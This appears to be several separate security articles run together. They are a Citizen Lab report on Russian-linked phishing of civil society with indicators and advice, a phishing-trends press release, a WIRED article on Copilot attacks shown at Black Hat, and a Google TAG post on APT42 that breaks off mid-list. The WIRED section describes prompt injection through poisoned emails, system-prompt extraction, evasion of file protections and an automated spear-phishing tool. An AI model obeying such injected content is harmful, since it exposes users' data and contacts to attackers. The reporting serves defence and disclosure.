PDF sent in a campaign reported by Microsoft in December 2023 (left); PDF from the River of Phish campaign (right).

Finally, a PDF sent to one of the targets we examined contains multiple RoP elements, as well as an additional element previously associated with COLDRIVER. Specifically, the PDF contained an embedded link using a Customer Relationship Management (CRM) service previously reported as used by COLDRIVER, not a direct link to actor-registered infrastructure. In almost all other aspects, the document matched the RoP campaign. The PDF was sent in March 2024 and named “RS_version 1.3.pdf”. The email sender masqueraded as a retired US official seeking comment on a report on Ukraine. Language in the email describing a purported report and requesting a review was identical to other RoP emails. The attached PDF matched all RoP metadata, and the name used variants on “RS” and “Draft 1.3” naming observed in multiple RoP PDFs (See: Figure 2 ). However, unlike the other PDFs that included a direct link to a first-stage domain, this file included a link through HubSpot, a CRM provider.

In 2023 Microsoft identified COLDRIVER as a HubSpot user, and specifically noted the practice of embedding HubSpot domains in the targeting PDF in an attempt to evade detection.

River of Phish: Signs of Continued Evolution?

In addition to the previous use of HubSpot, earlier COLDRIVER reporting mentioned clusters of domains named around a particular theme or service being impersonated, such as proton-docs[.]com , proton-reader[.]com , and proton-viewer[.]com reported by Microsoft in 2022 . However both Microsoft and Recorded Future noted that COLDRIVER appeared to be using a “ more randomized ” domain generation mechanism starting in 2023, suggesting adaptation to previous detection techniques, and an effort to hide targets. RoP first-stage infrastructure did not include any themes in domain naming, however we note that our report focuses specifically on civil society clusters and thus it is possible that COLDRIVER is using other domain naming schemas against other targets.

Previous reporting also identified COLDRIVER domains registered through Namecheap. During this campaign we observed that the domain registrar of choice changed to Hostinger sometime between January and March of 2024. PwC reporting highlighted that COLDRIVER has previously used Hostinger as a registrar in 2022, however more evidence is needed to determine whether this is a change that will persist across future COLDRIVER activity.

In addition to the analysis in this section, we have also developed a YARA rule (See: Appendix) that will assist other researchers in identifying other PDF files likely attributable to River of Phish / COLDRIVER.

4. COLDWASTREL: A New Threat Actor Surfaces?

In March 2023, our investigative partner Access Now began receiving cases of personalized phishing. The first were shared by the Russian human rights organization First Department. Access Now shared the cases with the Citizen Lab. Superficially, the messages had much in common with COLDRIVER. For example, the attacker sent PDF attachments with references to ProtonMail and ProtonDrive designed to trick targets into clicking on a link. However, close analysis revealed numerous differences, ultimately leading us to conclude that these were the work of a separate threat actor.

Consistent Differences Between Bait PDFs

This campaign deviates in several important aspects from COLDRIVER, such as the characteristics of the malicious PDF ( see Table 7 ) and front-end infrastructure. At this time, we assess that this activity cluster is not the work of the COLDRIVER operator and warrants further investigation.

	COLDRIVER	COLDWASTREL
PDF Version	1.4	1.5
PDF Language	en-US	ru-RU
PDF Author	Plausible-yet-obscure English language names	“User”
Links in PDF	Unique to each PDF	Consistent across multiple targets
Links in PDF	Redirected to fingerprint, then to separate domain/site to gather credentials	Hosted the phishing kit directly.

Our colleagues at Access Now have identified an additional COLDWASTREL PDF on VirusTotal which we include here to assist other researchers in pursuing this threat actor.

COLDWASTREL PDF on VirusTotal

Infrastructure differences.

In addition to the differences in the PDF content and metadata, there were several other notable differences between the two attacks:

All pre-2024 COLDWASTREL PDFs contained a link to the same domain, protondrive[.]online . This tactic deviates from the COLDRIVER activity that we investigated, which seemed to use a different domain for each PDF, without making use of a lookalike domain.
The domain protondrive[.]online also differs from the infrastructure seen with COLDRIVER. The domain was registered through URL Solutions Inc, which deviates from the RoP/COLDRIVER TTPs described above.

Together with Access Now, we are referring to this operator as COLDWASTREL. We hope that other research teams will be able to advance this investigation further using indicators provided in Access Now’s report . While we are not attributing this campaign, and have only a limited number of targets, we note that the COLDWASTREL targeting that we have observed does appear to align with the interests of the Russian government.

Fresh COLDWASTREL?

Shortly prior to publication of this report, we have tentatively identified what appears to be renewed COLDWASTREL targeting, based on TTPs, targeting overlap and infrastructure similarity. In this attack, the decoy PDF included the domain protondrive[.]me which, when clicked, redirected to phishing hosted at protondrive[.]services .

An August 2024 COLDWASTREL phishing page. The prepopulated email address of the target has been redated.

5. Why Do Some Governments Still Phish?

Governmental threat actors, including in states that possess a high degree of technical competency (e.g. reserves of zero-day exploits), continue to phish because personalized phishing still works . When the cost of discovery remains low, phishing remains not only an effective technique, but a way to continue global targeting while avoiding exposing more sophisticated (and expensive) capabilities to discovery.

Threat actors like the FSB are equipped with substantial intelligence gathering and analytical capabilities. They possess a detailed window into potential targets’ relationships and work activities which enables operators to craft very credible phishing lures. Research shows that phishing leveraging personal information has a much higher probability of success , and we speculate that a mature phishing campaign against a longstanding target benefits from a positive feedback loop in which more cycles of phishing yield ever-more detailed information that can be used to create increasingly convincing lures for future victims.

Where we do see evolution and tactical cleverness from COLDRIVER, it remains just enough to bypass certain modes of discovery. For example, in the River of Phish campaign, we see a wide range of paired sender names, domains, and PDF metadata. It is possible that these pairings are each used for only a very small number of targets. This approach may indicate efforts to evade detection by popular email platforms.

As platform and endpoint security continues to thwart attacks, attackers must rely on increasingly sophisticated social engineering that can be hard to distinguish from normal communications. Confirming the authenticity of the message and sender will protect both parties, and is well worth the extra time and effort. As COLDRIVER’s operators must know, this is not a practical action for every message.

Smash & Grab Phishing?

Numerous features of COLDRIVER’s activities increase the chance of a successful compromise while also increasing the chance that a sophisticated target or analyst will identify the communications as malicious.

For example, impersonating an individual known to the target increases the likelihood of discovery because the target can usually contact the impersonated individual to inquire whether the communication is authentic. This chance of discovery is compounded by the use of a bait document ruse that is also likely to lead to puzzled victims, reports, and eventual discovery.

This sort of social engineering tactic is well suited to a persistent adversary that does not face reputational or criminal penalties from discovery. For example, the operators of COLDRIVER presumably enjoy the protection of the Russian government, and know better than to schedule a holiday at Disney World in Florida.

While the volume of past reporting on COLDRIVER has probably disrupted specific campaigns, it is unlikely to put a stop to their activity. Indeed, we see evidence that the operator makes minimal changes in their tactics in response to disruptions. Such changes buy them a modest window of time to continue targeting even though a degree of discovery, including further exposure by researchers and even governments, remains inevitable.

6. The Russian Cyber Espionage Landscape

Russia has a long history of espionage that reaches back to pre-Soviet times, and has engaged in cyber espionage campaigns and active cyber operations for decades . These operations have been extensively studied by academics , civil society organizations, journalists , governments and the commercial cybersecurity community. Generally, Russian cyber espionage and active cyber operations are undertaken independently by multiple (and sometimes competing ) state security agencies, occasionally with the participation of organized criminal groups or other private sector entities (e.g., NTC Vulkan , RomCom , Cadet Blizzard ).

There are several Russian and Russian-aligned entities that undertake or are responsible for cyber espionage (see here ). Russia’s foreign intelligence service, the SVR ( Sluzhba Vneshney Razvedki ), is responsible for foreign intelligence gathering and is generally known for long-term espionage campaigns such as those publicly referred to as APT29, “Cozy Bear” or “The Dukes.” SVR-linked campaigns have typically involved accessing credentials of targeted entities through password spraying, brute forcing, and other means of accessing cloud and other accounts.

Russia’s main intelligence directorate of the armed forces, the GRU, is associated with cyber espionage and cyberwarfare operations designated as APT28, Fancy Bear, and Sandworm, and has been linked to DDoS and disruptive malware attacks on critical infrastructure, the financial sector, government and non-governmental organizations, and other sectors. The US, UK and other Western governments have also linked this entity to the compromise of edge routers in order “to host spear-phishing landing pages and custom tools.”

Meanwhile, Russia’s FSB has responsibilities covering internal security, counterintelligence, and foreign espionage. Two units within the FSB, Centre 16 and Centre 18, are responsible for cyber espionage, with the activities of COLDRIVER falling under the umbrella of the latter. According to a UK government assessment , Centre 18 is also known as the Centre for Information Security (TsIB) Military Unit 64829.

7. Civil Society Targeting by Russia: Always Present

Cyber espionage campaigns and active cyber operations targeting government entities, critical infrastructure, businesses and financial institutions have traditionally received the bulk of commercial cybersecurity firms’ and media attention. However, this selection bias arising from commercial priorities has produced a distorted view of the overall victim set. Until recently, attacks targeting civil society tended to be overlooked in industry and government reporting because civil society lacks the resources to pay for high-end services, which means that indicators that might be gleaned from civil society may be largely unseen by cybersecurity firms.

A major takeaway of the last decade and a half of the Citizen Lab’s research into digital espionage is that civil society is a major and often overlooked segment, despite being targeted by the same groups that attack government and industry. Authoritarian governments are particularly sensitive to political opposition, dissidents and investigative journalism and routinely orient their cyber espionage campaigns towards groups involved in those activities, both at home and abroad. Cyber espionage against civil society is also a major component of digital transnational repression , which has been growing in scope and scale worldwide.

In 2017, for example, the Citizen Lab published a report detailing a Russia-aligned hack and leak operation, which we called “Tainted Leaks.” The investigation detailed an extensive phishing operation targeting 200 unique individuals across 39 countries. Those targets included senior government and military officials, CEOs of energy companies, and civil society. We discovered that civil society targets, including academics, journalists, activists, and members of NGOs, represented the second largest cluster set (21%), after government officials. Although we could not attribute that operation to a single entity, there were several indicators suggesting links to APT28, a Russian threat actor affiliated with the GRU.

These cyber attacks targeting civil society are gaining wider visibility, thanks in part to the 10 plus years of reporting by the Citizen Lab, Access Now, Amnesty International, investigative journalists, and media consortia. The US, UK, Canada and other Western governments, as well as cybersecurity firms , have formally acknowledged the frequency of and risks to civil society stemming from cyber espionage and cyber operations, now echoing civil society’s reporting.

Other Digital Threats to Civil Society Groups Working On and In Russia

Civil society is under extreme threat in Russia. A recent study conducted by the Justice for Journalists Foundation counts a total of 5,262 cases of attacks/threats against professional and civilian media workers and editorial offices of traditional and online media, as well as against Russian journalists abroad in 2021-2023.

For those still residing inside the country, the threat of raids and seizure of equipment is ever-present. Russia is currently among the top five countries in the world for arrests of journalists. In addition, the threat of physical violence for those located both inside and outside Russia is constant, with journalists and civil society figures regularly beaten , tortured , poisoned , and imprisoned . Prominent opposition voices have been killed, or have died in custody. Russia is known for its “ highly aggressive ” practice of transnational repression, which involves the targeting of dissidents, human rights defenders, and other civil society members living in exile/outside Russia through different methods including poisonings and killings.

Beyond these physical threats, civil society groups operating inside Russia, in exile, or other groups working on Russian issues face a wide range of digital threats. A large number of civil society groups and independent media organizations have moved into exile since the 2022 full-scale invasion of Ukraine by Russia . Today, many organizations-in-exile operate in a geographically dispersed and decentralized manner, making them dependent on online communications. The critical dependence on technology combined with frequent resource constraints makes these groups exceptionally vulnerable to a wide range of digital threats.

Communications and information in Russia are subject to an extensive censorship regime, impacting the ability of audiences within Russia to access information and blocking the flow of information out of Russia. These restrictions include direct censorship of websites and social media platforms and blocking on specific communications protocols such as VPNs . This blocking also hampers organizing and coordination between domestic and foreign civil society organizations. For example, a 2023 Citizen Lab report on the Russian social networking site VK discovered that the platform “blocked content posted by independent news organizations, as well as content related to Ukrainian and Belarusian issues, protests, and lesbian, gay, bisexual, transgender, intersex, and queer (LGBTIQ) content.”

Threats & Harassment

Prominent critics of the regime, antiwar activists, and independent media regularly face extensive intimidation and harassment campaigns both in and outside of Russia. These campaigns may include highly targeted online threats , backed by meticulous research into the personal details and surveillance of the target.

Indirect Censorship Through Malicious Reporting and Pressuring Tech Platforms

Prominent regime targets are often subjected to extensive and coordinated campaigns to report social media accounts and posts on platforms, like Instagram and Facebook, with the goal of triggering account suspensions and post deletions. For example, a prominent Russian researcher and antiwar activist who spoke with us counted 83 complaints against her Instagram account submitted in a single 11-hour period in July 2024. The Russian government has also reportedly applied pressure on companies like Apple and Google to delete opposition and VPN apps, as well as civil society YouTube videos .

Account Takeovers and Honeypots

Beyond the sophisticated social engineering described in this report, popular chat programs, such as Telegram, are regularly targeted with a range of tactics for account hijacking and takeovers.

The number of tactics to target accounts and private information are too numerous to list, and are constantly evolving. For example, the co-founder of a Russian NGO that assists imprisoned antiwar activists described to us a new attack technique which relies on a fake Telegram “Helpline bot” impersonating the project of a genuine non-governmental organization. Such a fake helpline could be easily used to gather account information and identifying details from at-risk activists inside Russia, potentially as a precursor to eliciting sensitive information or account takeovers.

8. Protect Yourself & Your Colleagues

We believe that COLDRIVER and other Russian-government backed threat actors will persist in targeting civil society. While large email platforms continue to track and seek to disrupt these operators, this case shows that attacks can still make it through their defenses and into inboxes.

Do you think you have been targeted by COLDRIVER, COLDWASTREL or other kinds of personalized phishing? We encourage you to contact Access Now’s Digital Security Helpline to seek assistance.

Do you think that COLDRIVER or similar governmental phishing groups may target you in the future ? If so, we encourage you to review the steps below. However, these recommendations are not comprehensive, and there is no substitute for seeking expert assistance from competent professionals such as Access Now’s Helpline.

The following recommendations have been prepared jointly by Access Now and the Citizen Lab:

Start with prevention

Use two-factor authentication, correctly: Experts agree that setting up two-factor authentication (2FA) is one of the most powerful ways to protect your account from getting hacked.

However, hackers like COLDRIVER and COLDWASTREL may try to trick you into entering your second factor; we have seen attackers successfully compromise a victim who had enabled 2FA. People using SMS-messaging as their second factor are also at greater risk of having their codes stolen, if a bad actor takes over their phone account.

We recommend that people use more advanced 2FA options such as security keys or, if they are Gmail users, Google Passkeys. Here are three guides for increasing the level of security for your account:

Get Google Passkeys (Google)
How to: Enable two-factor authenticatio n (Electronic Frontier Foundation)
Set up multi factor authentication (Consumer Reports)
Use a security key (Consumer Reports)

Enroll in programs for high-risk users. Google and some other providers offer optional programs for people who, because of who they are or what they do, may face additional digital risks. These programs not only increase the security of your account, but also flag to companies that you may face more sophisticated attacks. Such programs include:

Google Advanced Protection
Microsoft Account Guard
Proton Sentinel

Received a message? Be a five second detective

Step one: check your inbox for the sender’s email. Ask yourself if you have received messages from this account before. COLDRIVER often uses lookalike emails to impersonate people known to the target either personally or professionally, so may see an email that appears to come from someone you know, writing about something you would expect them to write about. Even if you have received previous messages from the same email address, it is possible to “spoof” a familiar looking email address, so move on to the next step.
Step two: check with the sender over a different medium . If you have any concerns or are at all suspicious, do not open any PDF attachment or click on any link sent in the email. Instead, check directly with the purported sender, via another service, to confirm whether or not they’ve reached out to you. If you don’t already have direct contact with them, consider asking someone you trust to inquire on your behalf.
If you are viewing an attached document inside your webmail, you should remain careful. Don’t just click on any links ; copy and paste them into your browser before visiting. Examine the domain carefully: Is it what you would expect for the site you expect to be visiting? Advanced phishing kits are very good at impersonating popular services, and often the only visual clue that it is not the authentic site will be in the address bar of the browser.
If you see a “login page” pop up, stop . This is a good time to consult a trusted expert.
Step four: beware of “encrypted” or “protected” PDFs. This kind of message is almost always a cause for concern. Legitimately encrypted PDFs almost never include a single “click here” button inside the PDF, and they don’t show a blurred version of the contents. Never click on any “login” links or “buttons” inside a PDF you have been sent.

Considering Online Virus Checking Sites? You may wish to use online virus scanning sites such as VirusTotal or Hybrid Analysis to check suspicious links or files.

These services offer a useful service and can be part of a good security practice, but they come with a very important caveat: when you use such free services, you are not the customer, you are the product. Your files are available to many researchers, companies, and governments.
We do not recommend using such tools to check “sensitive” files that may contain personal information or other private topics. Instead, contact a trusted expert that can help.

Think you are being targeted?

These recommendations address the kind of phishing that COLDRIVER and COLDWASTREL are currently using, but there are many other ways you could be targeted Whatever your level of risk, we encourage you to get personalized security recommendations from the Security Planner , which also maintains a list of emergency resources and advanced security guides .

If you suspect that you have already been targeted in an attack, reach out to a trusted practitioner for advice. It is crucial to evaluate any damage to your organization and/or to other related organizations and individuals, such as partners, participants, grantees, and others. If this is the case, keep them informed about what has happened, what has been leaked, how this may impact them, and what steps you are taking to mitigate this impact.

If you believe you have been compromised : Access Now’s Digital Security Helpline is available to support members of civil society, including activists, media organizations, journalists, and human rights defenders, 24/7 in nine languages, including Russian .

Change your password right away . If you are using the same password for other accounts, you should change the password for those accounts, too. Consider using a password manager to keep track of multiple passwords.
You can also review access logs on your accounts, such as Proton Mail’s Authentication Logs , Gmail’s Last Account Activity , and review devices with account access , as well as Microsoft’s Check recent sign-in activity . Some users may still have questions after reviewing these logs. We encourage you to make a copy of the logs if you suspect you may have been targeted, to share with an expert for review.

Acknowledgments

The Citizen Lab would like to express our deepest gratitude to the many targets and organizations with suspect messages that consented to share indicators and materials with us, and discuss their experiences. Without their participation, this investigation would have been impossible.

We would also like to thank many researchers and threat intelligence teams for feedback, including the teams at Mandiant, Microsoft Threat Intelligence Center, Proofpoint, and PwC.

We also thank Friendly Robot and TNG.

Thanks to our Citizen Lab colleagues Siena Anstis, Jakub Dalek, Bill Marczak, and Adam Senft for their careful review and editorial assistance, Mari Zhou for graphical assistance and report art, and Snigdha Basu and Alyson Bruce for communications support.

Appendix: Indicators of Compromise

Coldriver pdf hashes.

b07d54a178726ffb9f2d5a38e64116cbdc361a1a0248fb89300275986dc5b69d

0ded441749c5391234a59d712c9d8375955ebd3d4d5848837b8211c6b27a4e88

efa2fd8f8808164d6986aedd6c8b45bb83edd70ca4e80d7ff563a3fbc05eab89

c1fa7cd73a14946fc760a54ebd0c853fab24a080cbf6b8460a949f28801e16fc

603221a64f2843674ad968970365f182c228b7219b32ab3777c265804ef67b0a

df9d77f3e608c92ef899e5acd1d65d87ce2fdb9aab63bbf58e63e6fd6c768ac3

384d3027d92c13da55ceef9a375e8887d908fd54013f49167946e1791730ba22

79f93e57ad6be28aae62d14135140289f09f86d3a093551bd234adc0021bb827

00664f72386b256d74176aacbe6d1d6f6dd515dd4b2fcb955f5e0f6f92fa078e

Yara Rule for River of Phish PDFs

COLDRIVER First-stage Domains

ithostprotocol[.]com

xsltweemat[.]org

egenre[.]net

esestacey[.]net

ideaspire[.]net

eilatocare[.]com

vocabpaper[.]com

matalangit[.]org

togochecklist[.]com

4a9a2c2926b7b8e388984d38cb9e259fb4060cccc2d291c7910be030ae5301a3

COLDWASTREL Domains

protondrive[.]online

protondrive[.]services (tentative)

protondrive[.]me (tentative)

service-proton[.]me (Per Access Now’s analysis)

Unless otherwise noted this site and its contents are licensed under a Creative Commons Attribution 2.5 Canada license.

Read the Latest Threat Report

File-Sharing Phishing Attacks Surge 350%, According to New Research from Abnormal Security

Threat actors increasingly exploit file sharing services to advance phishing attacks, while continuing to scale traditional BEC attacks by 50% over the last year

SAN FRANCISCO, August 14, 2024 - Abnormal Security , the leader in AI-native human behavior security, today released its H2 2024 Email Threat Report , revealing the growing threat of file-sharing phishing attacks, whereby threat actors use popular file-hosting or e-signature solutions as a disguise to manipulate their targets into revealing private information or downloading malware.

Sophisticated File-sharing Phishing Attacks on the Rise

Examining data collected between June 2023 and June 2024, Abnormal saw file-sharing phishing volume more than triple, increasing 350% over the year. The majority of these attacks were sophisticated in nature, with 60% exploiting legitimate domains, most commonly webmail accounts, such as Gmail, iCloud, and Outlook; productivity and collaboration platforms; file storage and sharing platforms like Dropbox; and e-signature solutions like Docusign.

“The trust that people place in these kinds of services—especially those with recognizable brand names—makes them the perfect vehicle for launching phishing attacks,” said Mike Britton, chief information security officer at Abnormal Security. “Very few companies block URLs from these services because they aren’t inherently malicious. And by dispatching phishing emails directly from the services themselves, attackers hide in plain sight, making it harder for their targets to distinguish between legitimate and malicious communications. And when attackers layer in social engineering techniques, identifying these attacks becomes near-impossible.”

Finance and Built Environment Firms are Most Vulnerable

The finance industry was found to be most at risk, with file sharing phishing attacks making up one in ten attacks. As financial institutions rely on file-sharing platforms to securely exchange documents, attackers have ample opportunities to slip in a fraudulent file-sharing notification among the sea of invoices, contracts, investment proposals, and regulatory updates.

The second most vulnerable industry was construction and engineering, followed by real estate and property management companies. These sectors not only rely heavily on frequent document transfers via file-sharing platforms, but also involve time-sensitive projects with large payouts. By exploiting the urgency of these exchanges, attackers have an opportunity to send file-sharing phishing attacks that appear time-critical and blend in seamlessly with legitimate emails.

BEC and VEC Remain Persistent Threats

The biannual report also revealed the continued growth of business email compromise (BEC) and vendor email compromise (VEC) attacks:

BEC attacks grew by more than 50% over the last year, with attacks on smaller organizations jumping nearly 60% in the last half.

41% of Abnormal customers were targeted by VEC each week in the first half of 2024, a slight increase over the 37% targeted in the second half of 2023.

Construction and engineering firms, as well as retailers and consumer goods manufacturers, were most vulnerable to VEC attacks, with 70% of organizations receiving at least one VEC attack in the first half of the year.

Britton continued, “Cybercriminals are continuing to use email to target human behavior, and through a variety of techniques—whether it’s leveraging social engineering tactics for BEC, or using the guise of legitimate applications in their phishing schemes. The report findings underscore this deliberate shift away from overt payloads and threat signatures, and toward email attacks designed to manipulate behavior. Keeping up with these threats will require organizations to adapt accordingly, recentering their defenses on protecting humans as their most vulnerable endpoints.”

Download the full H2 2024 Email Threat Report, “Bait and Switch: File-Sharing Phishing Attacks Surge 350% ”, here .

About Abnormal Security

Abnormal Security is the leading AI-native human behavior security platform, leveraging machine learning to stop sophisticated inbound attacks and detect compromised accounts across email and connected applications. The anomaly detection engine leverages identity and context to understand human behavior and analyze the risk of every cloud email event—detecting and stopping sophisticated, socially-engineered attacks that target the human vulnerability.

You can deploy Abnormal in minutes with an API integration for Microsoft 365 or Google Workspace and experience the full value of the platform instantly. Additional protection is available for Slack, Workday, Salesforce, ServiceNow, Zoom, Amazon Web Services and multiple other cloud applications.

Media Contact

Director of Communications

[email protected]

Get AI Protection for Your Human Interactions

To revisit this article, visit My Profile, then View saved stories .

The Big Story
Newsletters
Steven Levy's Plaintext Column
WIRED Classics from the Archive
WIRED Insider
WIRED Consulting

Microsoft’s AI Can Be Turned Into an Automated Phishing Machine

Microsoft raced to put generative AI at the heart of its systems. Ask a question about an upcoming meeting and the company’s Copilot AI system can pull answers from your emails, Teams chats, and files—a potential productivity boon. But these exact processes can also be abused by hackers.

Today at the Black Hat security conference in Las Vegas, researcher Michael Bargury is demonstrating five proof-of-concept ways that Copilot, which runs on its Microsoft 365 apps, such as Word, can be manipulated by malicious attackers, including using it to provide false references to files, exfiltrate some private data, and dodge Microsoft’s security protections.

One of the most alarming displays, arguably, is Bargury’s ability to turn the AI into an automatic spear-phishing machine . Dubbed LOLCopilot , the red-teaming code Bargury created can—crucially, once a hacker has access to someone’s work email—use Copilot to see who you email regularly, draft a message mimicking your writing style (including emoji use), and send a personalized blast that can include a malicious link or attached malware.

“I can do this with everyone you have ever spoken to, and I can send hundreds of emails on your behalf,” says Bargury, the cofounder and CTO of security company Zenity, who published his findings alongside videos showing how Copilot could be abused . “A hacker would spend days crafting the right email to get you to click on it, but they can generate hundreds of these emails in a few minutes.”

That demonstration, as with other attacks created by Bargury, broadly works by using the large language model (LLM) as designed: typing written questions to access data the AI can retrieve. However, it can produce malicious results by including additional data or instructions to perform certain actions. The research highlights some of the challenges of connecting AI systems to corporate data and what can happen when “untrusted” outside data is thrown into the mix—particularly when the AI answers with what could look like legitimate results.

The Slow-Burn Nightmare of the National Public Data Breach

Among the other attacks created by Bargury is a demonstration of how a hacker—who, again, must already have hijacked an email account—can gain access to sensitive information, such as people’s salaries, without triggering Microsoft’s protections for sensitive files . When asking for the data, Bargury’s prompt demands the system does not provide references to the files data is taken from. “A bit of bullying does help,” Bargury says.

In other instances, he shows how an attacker—who doesn’t have access to email accounts but poisons the AI’s database by sending it a malicious email—can manipulate answers about banking information to provide their own bank details. “Every time you give AI access to data, that is a way for an attacker to get in,” Bargury says.

Another demo shows how an external hacker could get some limited information about whether an upcoming company earnings call will be good or bad , while the final instance, Bargury says, turns Copilot into a “malicious insider ” by providing users with links to phishing websites.

Phillip Misner, head of AI incident detection and response at Microsoft, says the company appreciates Bargury identifying the vulnerability and says it has been working with him to assess the findings. “The risks of post-compromise abuse of AI are similar to other post-compromise techniques,” Misner says. “Security prevention and monitoring across environments and identities help mitigate or stop such behaviors.”

As generative AI systems, such as OpenAI’s ChatGPT , Microsoft’s Copilot , and Google’s Gemini , have developed in the past two years, they’ve moved onto a trajectory where they may eventually be completing tasks for people, like booking meetings or online shopping . However, security researchers have consistently highlighted that allowing external data into AI systems, such as through emails or accessing content from websites, creates security risks through indirect prompt injection and poisoning attacks.

“I think it’s not that well understood how much more effective an attacker can actually become now,” says Johann Rehberger, a security researcher and red team director, who has extensively demonstrated security weaknesses in AI systems . “What we have to be worried [about] now is actually what is the LLM producing and sending out to the user.”

Bargury says Microsoft has put a lot of effort into protecting its Copilot system from prompt injection attacks, but he says he found ways to exploit it by unraveling how the system is built. This included extracting the internal system prompt , he says, and working out how it can access enterprise resources and the techniques it uses to do so. “You talk to Copilot and it’s a limited conversation, because Microsoft has put a lot of controls,” he says. “But once you use a few magic words, it opens up and you can do whatever you want.”

Rehberger broadly warns that some data issues are linked to the long-standing problem of companies allowing too many employees access to files and not properly setting access permissions across their organizations. “Now imagine you put Copilot on top of that problem,” Rehberger says. He says he has used AI systems to search for common passwords, such as Password123, and it has returned results from within companies.

Both Rehberger and Bargury say there needs to be more focus on monitoring what an AI produces and sends out to a user. “The risk is about how AI interacts with your environment, how it interacts with your data, how it performs operations on your behalf,” Bargury says. “You need to figure out what the AI agent does on a user's behalf. And does that make sense with what the user actually asked for.”

You Might Also Like …

Politics Lab: Get the newsletter and listen to the podcast

What happens when you give people free money

Not everyone loses weight on Ozempic

The Pentagon wants to spend $141 billion on a doomsday machine

Event: Join us for the Energy Tech Summit on October 10 in Berlin

Threat Analysis Group

Iranian backed group steps up phishing campaigns against Israel, U.S.

Aug 14, 2024

[[read-time]] min read

Today Google’s Threat Analysis Group (TAG) is sharing insights on APT42, an Iranian government-backed threat actor, and their targeted phishing campaigns against Israel and Israeli targets. We are also confirming recent reports around APT42’s targeting of accounts associated with the U.S. presidential election.

Associated with Iran’s Islamic Revolutionary Guard Corps (IRGC), APT42 consistently targets high-profile users in Israel and the U.S., including current and former government officials, political campaigns, diplomats, individuals who work at think tanks, as well as NGOs and academic institutions that contribute to foreign policy conversations. In the past six months, the U.S. and Israel accounted for roughly 60% of APT42’s known geographic targeting, including the likes of former senior Israeli military officials and individuals affiliated with both U.S. presidential campaigns. These activities demonstrate the group’s aggressive, multi-pronged effort to quickly alter its operational focus in support of Iran’s political and military priorities.

a chart showing that over 60% of users targeted by APT42 are in the US and Israel

Between February and late July 2024, APT42 heavily targeted users in Israel and the U.S.

Spikes in APT42 targeting against Israel

a chart showing increases in users targeted

Targeted APT42 credential phishing campaigns focused on Israel between February and late July 2024

In April 2024, APT42 intensified their targeting of users based in Israel. They sought out people with connections to the Israeli military and defense sector, as well as diplomats, academics, and NGOs.

APT42 uses a variety of different tactics as part of their email phishing campaigns — including hosting malware, phishing pages, and malicious redirects. They generally try to abuse services like Google (i.e. Sites, Drive, Gmail, and others), Dropbox, OneDrive and others for these purposes. In the course of our work to disrupt APT42, TAG reset any compromised accounts, sent government-backed attacker warnings to the targeted users, updated detections, disrupted malicious Google Sites pages, and added malicious domains and URLs to the Safe Browsing blocklist — dismantling the group’s infrastructure.

an image showing a blue shield and the warning "Government backed attackers may be trying to steal your password"ing to

Government-backed attacker warning

Google Sites phishing: We took down multiple APT42-created Google Sites pages that masqueraded as a petition from the legitimate Jewish Agency for Israel calling on the Israeli government to enter into mediation to end the conflict. The text of the petition was embedded in image files instead of HTML. The Sites page included an ngrok redirect URL, a free service for developers that APT42 has previously used to redirect users to phishing pages.

a phishing campaign card reading "7 terrible hours - Qatar Offers Mediation"

APT42 Google Sites abuse from an April 2024 phishing campaign

Targeting military, defense, diplomats, academics, and civil society: APT42 attempted to use social engineering to target former senior Israeli military officials and an aerospace executive by sending emails masquerading as a journalist requesting comment on the recent air strikes. They also sent social engineering emails to Israeli diplomats, academics, NGOs and political entities. The emails were sent from accounts hosted by a variety of email service providers, and did not contain malicious content. These emails were likely meant to elicit engagement from the recipients before APT42 attempted to compromise the targets. Google suspended identified Gmail accounts associated with APT42.

A June 2024 campaign targeting Israeli NGOs used a benign PDF email attachment impersonating the legitimate Project Aladdin, which contained a shortened URL link that redirected to a phishing kit landing page designed to harvest Google login credentials.

image of a PDF with the header "Project Aladin"

Benign PDF leading to an APT42 phishing kit landing page

Spoofed Google Drive page

APT42 phishing kit landing page

Targeted credential phishing: APT42’s success in credential phishing is the result of persistence and heavy reliance on social engineering to appear more credible to their targets. They regularly create accounts or domains that impersonate organizations that might be of interest to the target. For example:

APT42 masqueraded as the legitimate Washington Institute for Near East Policy in multiple campaigns since April 2024, targeting Israeli diplomats and journalists, researchers at U.S. think tanks, and others. In these campaigns, attackers set the email display name as a legitimate researcher affiliated with the Washington Institute, but the underlying email address was not from the official .org domain.
APT42 registers typosquat domains very close to the legitimate domains of the organizations they impersonate. For example, APT42 used the domain understandingthewar[.]org to target U.S. military members by impersonating the legitimate Institute for the Study of War. Similarly, APT42 registered brookings[.]email, to spoof the Brookings Institution and used it in multiple campaigns targeting Israel.

Targeting individuals related to the U.S. presidential election

For many years, Google has worked to identify and disrupt malicious activity in the context of democratic elections. During the 2020 U.S. presidential election cycle, we disrupted APT42 attempts to target accounts associated with the Biden and Trump presidential campaigns.

In the current U.S. presidential election cycle, TAG detected and disrupted a small but steady cadence of APT42’s Cluster C credential phishing activity. In May and June, APT42 targets included the personal email accounts of roughly a dozen individuals affiliated with President Biden and with former President Trump, including current and former officials in the U.S. government and individuals associated with the respective campaigns. We blocked numerous APT42 attempts to log in to the personal email accounts of targeted individuals.

Recent public reporting shows that APT42 has successfully breached accounts across multiple email providers. We observed that the group successfully gained access to the personal Gmail account of a high-profile political consultant. In addition to our standard actions of quickly securing any compromised account and sending government-backed attacker warnings to the targeted accounts, we proactively referred this malicious activity to law enforcement in early July and we are continuing to cooperate with them.

At the same time, we also informed campaign officials that Google was seeing heightened malicious activity originating from foreign state actors and underscored the importance of enhanced account security protections on personal email accounts.

Today, TAG continues to observe unsuccessful attempts from APT42 to compromise the personal accounts of individuals affiliated with President Biden, Vice President Harris and former President Trump, including current and former government officials and individuals associated with the campaigns.

Understanding APT42’s tailored credential phishing

In phishing campaigns that TAG has disrupted, APT42 often uses tactics like sending phishing links either directly in the body of the email or as a link in an otherwise benign PDF attachment. In such cases, APT42 would engage their target with a social engineering lure to set-up a video meeting and then link to a landing page where the target was prompted to login and sent to a phishing page. One campaign involved a phishing lure featuring an attacker-controlled Google Sites link that would direct the target to a fake Google Meet landing page. Other lures included OneDrive, Dropbox and Skype. Over the last six months, we have systematically disrupted these attackers’ ability to abuse Google Sites in more than 50 similar campaigns.

Another APT42 campaign template is sending legitimate PDF attachments as part of a social engineering lure to build trust and encourage the target to engage on other platforms like Signal, Telegram or WhatsApp. We expect the attackers would then use these platforms to send a phishing kit to harvest credentials.

APT42 has a number of phishing kits that target a variety of sign-on pages including:

